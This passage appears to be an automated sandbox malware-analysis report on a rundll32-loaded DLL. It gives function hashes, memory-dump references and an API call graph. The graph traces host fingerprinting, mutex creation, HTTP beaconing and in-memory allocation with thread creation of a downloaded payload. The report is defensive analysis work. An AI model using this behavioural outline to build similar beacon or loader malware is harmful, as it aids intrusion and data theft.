                                                                                                                                            • Instruction Fuzzy Hash: 41516E33312A48DAEB96DF70D4903EC33A4EB58788F448125FF4967A95DE34C61AC358
                                                                                                                                            Function 0000000180014060 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                            • String ID: string too long
                                                                                                                                            • API String ID: 3668304517-2556327735
                                                                                                                                            • Opcode ID: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                            • Instruction ID: 5fc0c0a601f6c4d82b55d0d521c46b81e316b69cb665f141bfa2e52588e3f1ef
                                                                                                                                            • Opcode Fuzzy Hash: a3acfd3d82963a706bc48d948a37a32f85189e9a0e2e76b76b124625f236f818
                                                                                                                                            • Instruction Fuzzy Hash: 6321D4B271168CC1EE6A56A694493DC2242931EBE1F60C711FB3D0FBD6DE3986C94301
                                                                                                                                            Function 00000001800996E0 Relevance: 6.3, APIs: 4, Instructions: 271COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                            • Instruction ID: 975f7225a3a63e299421f78f145c918a74a67d24bf9757e7338846c982cfeb7d
                                                                                                                                            • Opcode Fuzzy Hash: ef292095189d688244afeea7f6b845bb184af88f8cb6fafd7eee9d63f68d16f4
                                                                                                                                            • Instruction Fuzzy Hash: D4B1D232616B8886EB96CF69E4403ED77A4F748FD8F149119EE4903BA8DF38C599C340
                                                                                                                                            Function 0000000180016E10 Relevance: 6.0, APIs: 4, Instructions: 50threadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$CurrentThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3792313647-0
                                                                                                                                            • Opcode ID: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                            • Instruction ID: 75230aab8a6d904f90b672090fcd263d29a486a149c04a4e1d63e4c13d8814a9
                                                                                                                                            • Opcode Fuzzy Hash: 5bfa75c5eac8daa5e5b124f9845cd5dbd0aa6498d9a00ed29e9f5e9b47d3ee95
                                                                                                                                            • Instruction Fuzzy Hash: 93118235B04F4482EB968B25F85439DA2A1FB8CBE4F448625FF6943BE4DF38C6598700
                                                                                                                                            Function 0000000180003BB0 Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2793162063-0
                                                                                                                                            • Opcode ID: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                            • Instruction ID: 829d03ffbff77bbca154661313b9d0eb454c077c2207eabb3bfd33caf306102b
                                                                                                                                            • Opcode Fuzzy Hash: 291ec1e7ae4a31a4ec110783320109d88dec717fbf20de4c32bb65debcfab247
                                                                                                                                            • Instruction Fuzzy Hash: C5116131605B4486E776CF61F4993CA63A0F78CB08F40A028DA8D87B55EF7CC2098B00
                                                                                                                                            Function 000000018000E1E0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 329COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                            • String ID: vector too long
                                                                                                                                            • API String ID: 3668304517-2873823879
                                                                                                                                            • Opcode ID: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                            • Instruction ID: 21201f496ad6a7353e8fa5487a27329982cc9aebad2248fd340af911cef24260
                                                                                                                                            • Opcode Fuzzy Hash: 4bb3616d7ea08d404592599af73fc3ed7cee367de65b429240fbc6d2583e8d6d
                                                                                                                                            • Instruction Fuzzy Hash: 73B104326056CC45EEE7CA11D5143E97AA0A34E7E4F88DA11FAA9277D5DF7CC7898300
                                                                                                                                            Function 00000001800D7BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7BF8
                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,000000018001D2F1,?,?,?,?,0000000180001063), ref: 00000001800D7C39
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                            • String ID: csm
                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                            • Opcode ID: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                            • Instruction ID: fcce759da6952b3a2c3e9be7184885aaee10aadabcae59dccbb82db99caeb89f
                                                                                                                                            • Opcode Fuzzy Hash: 8575af2157c29f55c7baebbd7653556403f1897381ddad26d7c95b73a62a9a2e
                                                                                                                                            • Instruction Fuzzy Hash: 99115B36614B8482EBA28B15E44038D77E4F78CB94F588225EE8D07B65EF3CC655CB00
                                                                                                                                            Function 000000018001F790 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • OutputDebugStringA.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7AA
                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000,000000018001F860,?,?,?,?,?,00000001800010A6), ref: 000000018001F7E0
                                                                                                                                            Strings
                                                                                                                                            • IsolationAware function called after IsolationAwareCleanup, xrefs: 000000018001F7A3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.4564089647.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.4563972162.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564293012.0000000180110000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564345949.0000000180148000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564420616.0000000180149000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.4564453093.0000000180151000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DebugErrorLastOutputString
                                                                                                                                            • String ID: IsolationAware function called after IsolationAwareCleanup
                                                                                                                                            • API String ID: 4132100945-2690750368
                                                                                                                                            • Opcode ID: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                            • Instruction ID: 713b0fca42d5e28324eac017ae06fe03b4fcbb217fb76e539ab89f48cb609f07
                                                                                                                                            • Opcode Fuzzy Hash: aaf881318e1cbf80df7b3db725b15d009ca645997f292fdca4c234dcf6e98535
                                                                                                                                            • Instruction Fuzzy Hash: 3D01DE70600D0E86FBF7976198883F913D1AB5D7A4F59D011E915C63A0EF38CACD8710

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:10.7%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:4.6%
                                                                                                                                            Total number of Nodes:868
                                                                                                                                            Total number of Limit Nodes:10
                                                                                                                                            execution_graph 4680 2e0c5c0 4681 2e0c641 4680->4681 4682 2e0c5de 4680->4682 4683 2e0c60a CreateFileMappingA 4682->4683 4683->4681 4684 2e0c648 MapViewOfFile 4683->4684 4684->4681 4685 2e0c67b 4684->4685 4690 2e0ca9c 4685->4690 4688 2e082b4 NtFreeVirtualMemory 4689 2e0c6d1 UnmapViewOfFile CloseHandle 4688->4689 4689->4681 4691 2e0c6a0 VirtualFree 4690->4691 4692 2e0caad 4690->4692 4691->4688 4696 2e0ca68 4692->4696 4695 2e082b4 NtFreeVirtualMemory 4695->4691 4697 2e0ca8b 4696->4697 4698 2e0ca7d 4696->4698 4700 2e082b4 NtFreeVirtualMemory 4697->4700 4699 2e0ca68 NtFreeVirtualMemory 4698->4699 4699->4697 4701 2e0ca95 4700->4701 4701->4695 3958 2e043c4 3963 2e041b4 3958->3963 3960 2e043cd 3961 2e043eb 3960->3961 3984 2e0c704 NtDelayExecution 3960->3984 3964 2e041d4 3963->3964 3985 2e06cb4 3964->3985 3966 2e041d9 3967 2e041fa GetCurrentProcess IsWow64Process 3966->3967 3978 2e041dd 3966->3978 3968 2e04227 3967->3968 3967->3978 3997 2e07274 GetAdaptersInfo 3968->3997 3970 2e0422c 3971 2e04266 CreateMutexW 3970->3971 3970->3978 3972 2e04286 GetLastError 3971->3972 3971->3978 3973 2e042ac GetModuleHandleW 3972->3973 3972->3978 4004 2e04c2c GetModuleHandleW GetCurrentProcessId 3973->4004 3978->3960 3981 2e042ec CreateThread 3982 2e04317 3981->3982 4615 2e043f4 3981->4615 4027 2e06c6c CreateThread 3982->4027 3984->3960 3986 2e06cbd 3985->3986 3996 2e06cf3 3986->3996 4029 2e0abe8 3986->4029 3996->3966 3998 2e072ad 3997->3998 4003 2e072d1 3997->4003 4055 2e0b388 NtAllocateVirtualMemory 3998->4055 4000 2e072df 4000->3970 4001 2e072b8 GetAdaptersInfo 4001->4003 4003->4000 4057 2e082b4 4003->4057 4060 2e082f4 4004->4060 4008 2e04c7f 4009 2e04d17 GetCurrentProcessId 4008->4009 4011 2e04d33 4008->4011 4012 2e04cf3 4008->4012 4009->4008 4013 2e04d44 4011->4013 4014 2e042c1 4011->4014 4012->4008 4070 2e0891c 4012->4070 4076 2e04d58 4013->4076 4014->3978 4016 2e07314 4014->4016 4017 2e0b388 NtAllocateVirtualMemory 4016->4017 4018 2e0732c 4017->4018 4128 2e0bfc0 4018->4128 4020 2e0737f 4021 2e0bfc0 NtAllocateVirtualMemory 4020->4021 4022 2e042d1 4021->4022 4022->3978 4023 2e071f0 4022->4023 4024 2e07208 4023->4024 4025 2e0bfc0 NtAllocateVirtualMemory 4024->4025 4026 2e042e1 4025->4026 4026->3978 4026->3981 4028 2e06ca3 4027->4028 4131 2e05a64 4027->4131 4028->3978 4030 2e0b1c8 4029->4030 4031 2e06ccf 4030->4031 4051 2e08a58 4030->4051 4031->3996 4033 2e099d0 4031->4033 4034 2e0a82d 4033->4034 4035 2e08a58 2 API calls 4034->4035 4036 2e06cd8 4034->4036 4035->4034 4036->3996 4037 2e0aa0c 4036->4037 4038 2e0ab3d 4037->4038 4039 2e0a8e0 7 API calls 4038->4039 4040 2e06ce1 4038->4040 4039->4038 4040->3996 4041 2e09350 4040->4041 4046 2e09892 4041->4046 4042 2e08a58 GetProcAddress GetProcAddressForCaller 4042->4046 4043 2e09972 4044 2e08a58 2 API calls 4043->4044 4045 2e06cea 4044->4045 4045->3996 4047 2e0b2a4 4045->4047 4046->4042 4046->4043 4046->4045 4048 2e0b315 4047->4048 4049 2e08a58 2 API calls 4048->4049 4050 2e0b372 4048->4050 4049->4048 4050->3996 4052 2e08a79 4051->4052 4054 2e08a72 4051->4054 4053 2e08b63 GetProcAddress GetProcAddressForCaller 4052->4053 4052->4054 4053->4054 4054->4030 4056 2e0b3c8 4055->4056 4056->4001 4058 2e082ce NtFreeVirtualMemory 4057->4058 4059 2e082ef 4057->4059 4058->4059 4059->4000 4079 2e08c30 4060->4079 4065 2e08d3c 4126 2e0b470 4065->4126 4068 2e08d87 4068->4008 4069 2e08d6e wsprintfA 4069->4068 4071 2e0893a 4070->4071 4072 2e08957 4071->4072 4073 2e0894c RtlGetVersion 4071->4073 4074 2e08961 GetVersionExW 4072->4074 4075 2e0896c 4072->4075 4073->4072 4074->4075 4075->4012 4077 2e04d73 4076->4077 4078 2e04d66 CloseHandle 4076->4078 4077->4014 4078->4077 4080 2e08c4e 4079->4080 4081 2e08c60 FindFirstVolumeW 4080->4081 4082 2e08c81 GetVolumeInformationW FindVolumeClose 4081->4082 4083 2e082fd 4081->4083 4082->4083 4084 2e08e18 4083->4084 4085 2e08e41 4084->4085 4094 2e08fc8 4085->4094 4088 2e04c73 4088->4065 4089 2e0b388 NtAllocateVirtualMemory 4090 2e08e63 4089->4090 4091 2e08e91 4090->4091 4099 2e0be64 4090->4099 4093 2e082b4 NtFreeVirtualMemory 4091->4093 4093->4088 4095 2e0b388 NtAllocateVirtualMemory 4094->4095 4097 2e08fe4 4095->4097 4096 2e08e4b 4096->4088 4096->4089 4097->4096 4103 2e08ec8 4097->4103 4100 2e0be7c 4099->4100 4106 2e0beac 4100->4106 4102 2e0bea5 4102->4091 4104 2e08eea 4103->4104 4105 2e08f05 wsprintfA 4104->4105 4105->4096 4109 2e0b704 4106->4109 4108 2e0bedb 4108->4102 4110 2e0b733 4109->4110 4111 2e0b718 4109->4111 4115 2e0b648 4110->4115 4112 2e082b4 NtFreeVirtualMemory 4111->4112 4114 2e0b725 4112->4114 4114->4108 4116 2e0b66f 4115->4116 4119 2e0b679 4115->4119 4123 2e0b430 4116->4123 4118 2e0b6a5 4118->4114 4120 2e0b388 NtAllocateVirtualMemory 4119->4120 4122 2e0b698 4119->4122 4120->4122 4121 2e082b4 NtFreeVirtualMemory 4121->4118 4122->4118 4122->4121 4124 2e0b445 VirtualQuery 4123->4124 4125 2e0b441 4123->4125 4124->4125 4125->4119 4127 2e08d5a GetUserNameA 4126->4127 4127->4068 4127->4069 4129 2e0b388 NtAllocateVirtualMemory 4128->4129 4130 2e0bfdc 4129->4130 4130->4020 4133 2e05aed 4131->4133 4162 2e05b5a new[] 4133->4162 4237 2e0c704 NtDelayExecution 4133->4237 4134 2e05ba7 4136 2e0c704 NtDelayExecution 4170 2e05c2f new[] 4136->4170 4138 2e082b4 NtFreeVirtualMemory 4138->4162 4139 2e0bfc0 NtAllocateVirtualMemory 4139->4170 4140 2e06404 wsprintfA 4140->4170 4141 2e06025 wsprintfA 4141->4162 4142 2e05f36 wsprintfA 4142->4162 4143 2e0bfc0 NtAllocateVirtualMemory 4143->4162 4145 2e082b4 NtFreeVirtualMemory 4145->4162 4146 2e0be64 3 API calls 4146->4162 4148 2e0b388 NtAllocateVirtualMemory 4148->4162 4149 2e0b388 NtAllocateVirtualMemory 4151 2e06187 WideCharToMultiByte 4149->4151 4150 2e0b388 NtAllocateVirtualMemory 4153 2e06243 WideCharToMultiByte 4150->4153 4154 2e0be64 3 API calls 4151->4154 4152 2e0b388 NtAllocateVirtualMemory 4155 2e062ff WideCharToMultiByte 4152->4155 4156 2e0be64 3 API calls 4153->4156 4154->4170 4157 2e0be64 3 API calls 4155->4157 4156->4170 4157->4170 4158 2e0be64 NtFreeVirtualMemory NtAllocateVirtualMemory VirtualQuery 4158->4170 4160 2e082b4 NtFreeVirtualMemory 4160->4170 4161 2e082b4 NtFreeVirtualMemory 4161->4162 4162->4134 4162->4143 4162->4146 4162->4148 4162->4161 4162->4170 4172 2e05484 4162->4172 4183 2e08424 4162->4183 4209 2e0b770 4162->4209 4217 2e06fc0 4162->4217 4221 2e04e28 4162->4221 4238 2e08bdc 4162->4238 4164 2e08bdc 3 API calls 4164->4170 4165 2e069a2 GetExitCodeThread 4165->4170 4167 2e069de GetExitCodeThread 4167->4170 4168 2e0b388 NtAllocateVirtualMemory 4168->4170 4170->4136 4170->4138 4170->4139 4170->4140 4170->4141 4170->4142 4170->4145 4170->4149 4170->4150 4170->4152 4170->4158 4170->4160 4170->4162 4170->4164 4170->4165 4170->4167 4170->4168 4171 2e06fc0 NtAllocateVirtualMemory 4170->4171 4244 2e06cfc 4170->4244 4248 2e05734 4170->4248 4171->4170 4173 2e054bc 4172->4173 4174 2e0b388 NtAllocateVirtualMemory 4173->4174 4175 2e054e2 4174->4175 4176 2e0b388 NtAllocateVirtualMemory 4175->4176 4177 2e054f8 InternetCrackUrlA 4176->4177 4178 2e0556e 4177->4178 4179 2e05554 4177->4179 4178->4162 4180 2e082b4 NtFreeVirtualMemory 4179->4180 4181 2e05561 4180->4181 4182 2e082b4 NtFreeVirtualMemory 4181->4182 4182->4178 4184 2e0b388 NtAllocateVirtualMemory 4183->4184 4185 2e08452 4184->4185 4186 2e08466 GetAdaptersInfo 4185->4186 4187 2e0845f 4185->4187 4188 2e0848d 4186->4188 4207 2e0865b 4186->4207 4187->4162 4189 2e0b388 NtAllocateVirtualMemory 4188->4189 4191 2e08498 GetAdaptersInfo 4189->4191 4190 2e08688 4193 2e0b388 NtAllocateVirtualMemory 4190->4193 4194 2e084c5 4191->4194 4192 2e082b4 NtFreeVirtualMemory 4192->4190 4195 2e0869b 4193->4195 4199 2e084e6 wsprintfA 4194->4199 4195->4187 4196 2e086ac GetComputerNameExA 4195->4196 4197 2e086c5 4196->4197 4198 2e08729 GetComputerNameExA 4196->4198 4202 2e086fa wsprintfA 4197->4202 4200 2e087db 4198->4200 4203 2e08746 4198->4203 4206 2e08502 4199->4206 4201 2e082b4 NtFreeVirtualMemory 4200->4201 4201->4187 4202->4198 4204 2e087a6 wsprintfA 4203->4204 4204->4200 4205 2e08627 wsprintfA 4205->4206 4205->4207 4206->4205 4206->4207 4208 2e085b2 wsprintfA 4206->4208 4207->4190 4207->4192 4208->4206 4210 2e0b7aa 4209->4210 4211 2e0b7b5 4210->4211 4212 2e0b7f0 4210->4212 4258 2e0c00c 4210->4258 4211->4170 4214 2e0c00c NtAllocateVirtualMemory 4212->4214 4215 2e0b822 4212->4215 4214->4215 4215->4211 4216 2e0c00c NtAllocateVirtualMemory 4215->4216 4216->4211 4218 2e06fd5 4217->4218 4220 2e06fe6 4217->4220 4219 2e0b388 NtAllocateVirtualMemory 4218->4219 4218->4220 4219->4220 4220->4162 4223 2e04e5d 4221->4223 4222 2e05484 3 API calls 4222->4223 4223->4222 4225 2e04ec6 4223->4225 4227 2e04fc6 4223->4227 4234 2e082b4 NtFreeVirtualMemory 4223->4234 4235 2e05022 4223->4235 4261 2e05078 4223->4261 4266 2e05160 4223->4266 4224 2e04d78 InternetOpenW InternetConnectA 4224->4225 4225->4223 4225->4224 4226 2e0bfc0 NtAllocateVirtualMemory 4225->4226 4225->4227 4233 2e082b4 NtFreeVirtualMemory 4225->4233 4226->4225 4228 2e05057 4227->4228 4229 2e0504c InternetCloseHandle 4227->4229 4231 2e0506a 4228->4231 4232 2e0505f InternetCloseHandle 4228->4232 4229->4228 4231->4170 4232->4231 4233->4225 4234->4223 4235->4227 4237->4133 4239 2e0b470 4238->4239 4240 2e08bef GetCursorPos 4239->4240 4241 2e08c02 GetTickCount 4240->4241 4242 2e08bfe 4240->4242 4290 2e0b620 RtlRandom 4241->4290 4242->4162 4245 2e06d12 4244->4245 4246 2e0b388 NtAllocateVirtualMemory 4245->4246 4247 2e06d2f 4245->4247 4246->4247 4247->4170 4249 2e05792 4248->4249 4250 2e0bfc0 NtAllocateVirtualMemory 4249->4250 4254 2e057b3 4250->4254 4251 2e057c0 4251->4170 4253 2e05a49 4255 2e082b4 NtFreeVirtualMemory 4253->4255 4254->4251 4254->4253 4291 2e0cf4c 4254->4291 4297 2e0cde8 4254->4297 4307 2e044c8 4254->4307 4255->4251 4259 2e0b388 NtAllocateVirtualMemory 4258->4259 4260 2e0c034 4259->4260 4260->4212 4262 2e050bc InternetReadFile 4261->4262 4264 2e05104 4262->4264 4265 2e050de 4262->4265 4263 2e0b704 3 API calls 4263->4265 4264->4225 4265->4262 4265->4263 4265->4264 4267 2e0b388 NtAllocateVirtualMemory 4266->4267 4268 2e051ab 4267->4268 4269 2e0be64 3 API calls 4268->4269 4271 2e05204 4269->4271 4270 2e05265 4272 2e05315 4270->4272 4274 2e05292 4270->4274 4271->4270 4273 2e0be64 3 API calls 4271->4273 4276 2e05350 HttpOpenRequestA 4272->4276 4277 2e05253 4273->4277 4275 2e052c7 HttpOpenRequestA 4274->4275 4278 2e0539c 4275->4278 4276->4278 4277->4270 4279 2e0be64 3 API calls 4277->4279 4280 2e053b3 InternetSetOptionA 4278->4280 4281 2e053d6 4278->4281 4285 2e053a4 4278->4285 4279->4270 4280->4281 4283 2e05424 HttpSendRequestA 4281->4283 4287 2e053e0 4281->4287 4282 2e05479 4282->4223 4286 2e05443 4283->4286 4284 2e082b4 NtFreeVirtualMemory 4284->4282 4285->4282 4285->4284 4286->4285 4288 2e082b4 NtFreeVirtualMemory 4286->4288 4289 2e053fb HttpSendRequestA 4287->4289 4288->4285 4289->4286 4290->4242 4295 2e0cf5a 4291->4295 4296 2e0cf5c 4291->4296 4292 2e0cfaa 4294 2e082b4 NtFreeVirtualMemory 4292->4294 4293 2e082b4 NtFreeVirtualMemory 4293->4296 4294->4295 4295->4254 4296->4292 4296->4293 4298 2e0ce04 4297->4298 4299 2e0b388 NtAllocateVirtualMemory 4298->4299 4300 2e0ce3b 4298->4300 4301 2e0ce6b 4299->4301 4300->4254 4301->4300 4302 2e0bfc0 NtAllocateVirtualMemory 4301->4302 4303 2e0ce9d 4302->4303 4304 2e0b388 NtAllocateVirtualMemory 4303->4304 4305 2e0cebc 4304->4305 4305->4300 4306 2e082b4 NtFreeVirtualMemory 4305->4306 4306->4300 4343 2e044ec 4307->4343 4308 2e047e3 4310 2e04900 4308->4310 4311 2e047ee 4308->4311 4309 2e04799 4312 2e04852 4309->4312 4313 2e047a4 4309->4313 4370 2e04334 4310->4370 4324 2e049ec 4311->4324 4325 2e0480f 4311->4325 4337 2e047de 4311->4337 4323 2e0bfc0 NtAllocateVirtualMemory 4312->4323 4314 2e0494c 4313->4314 4315 2e047af 4313->4315 4424 2e02b28 4314->4424 4317 2e04931 4315->4317 4318 2e047ba 4315->4318 4391 2e02d50 CreateToolhelp32Snapshot 4317->4391 4320 2e04942 4318->4320 4321 2e047c5 4318->4321 4423 2e0321c CreateThread 4320->4423 4327 2e047cc 4321->4327 4328 2e0483e 4321->4328 4342 2e04870 4323->4342 4444 2e07dfc 4324->4444 4330 2e049f8 4325->4330 4331 2e0481a 4325->4331 4326 2e04905 4326->4337 4375 2e0c704 NtDelayExecution 4326->4375 4334 2e047d7 4327->4334 4335 2e0491d 4327->4335 4358 2e07940 4328->4358 4330->4337 4455 2e07f54 4330->4455 4331->4337 4468 2e04a20 4331->4468 4334->4337 4345 2e07c98 4334->4345 4376 2e07768 4335->4376 4337->4254 4342->4337 4344 2e082b4 NtFreeVirtualMemory 4342->4344 4343->4308 4343->4309 4344->4337 4346 2e07cb7 4345->4346 4347 2e07cc4 MultiByteToWideChar 4346->4347 4476 2e07a84 4347->4476 4350 2e07ddf 4351 2e07dd8 4350->4351 4352 2e082b4 NtFreeVirtualMemory 4350->4352 4351->4337 4352->4351 4353 2e07d4b VirtualAlloc 4354 2e07d7e 4353->4354 4355 2e0b388 NtAllocateVirtualMemory 4354->4355 4356 2e07d88 CreateThread 4355->4356 4357 2e082b4 NtFreeVirtualMemory 4356->4357 4357->4351 4565 2e0830c 4358->4565 4360 2e07970 4360->4337 4361 2e07963 4361->4360 4362 2e08bdc 3 API calls 4361->4362 4363 2e079ba wsprintfW 4362->4363 4364 2e082b4 NtFreeVirtualMemory 4363->4364 4365 2e079df 4364->4365 4366 2e07a07 MultiByteToWideChar 4365->4366 4367 2e07a84 21 API calls 4366->4367 4368 2e07a4f 4367->4368 4368->4360 4573 2e0b8d4 4368->4573 4371 2e04357 4370->4371 4372 2e0434a SetEvent 4370->4372 4373 2e04361 ReleaseMutex CloseHandle 4371->4373 4374 2e0437b 4371->4374 4372->4371 4373->4374 4374->4326 4375->4326 4377 2e077a7 4376->4377 4378 2e0830c 4 API calls 4377->4378 4379 2e077d3 4378->4379 4380 2e08bdc 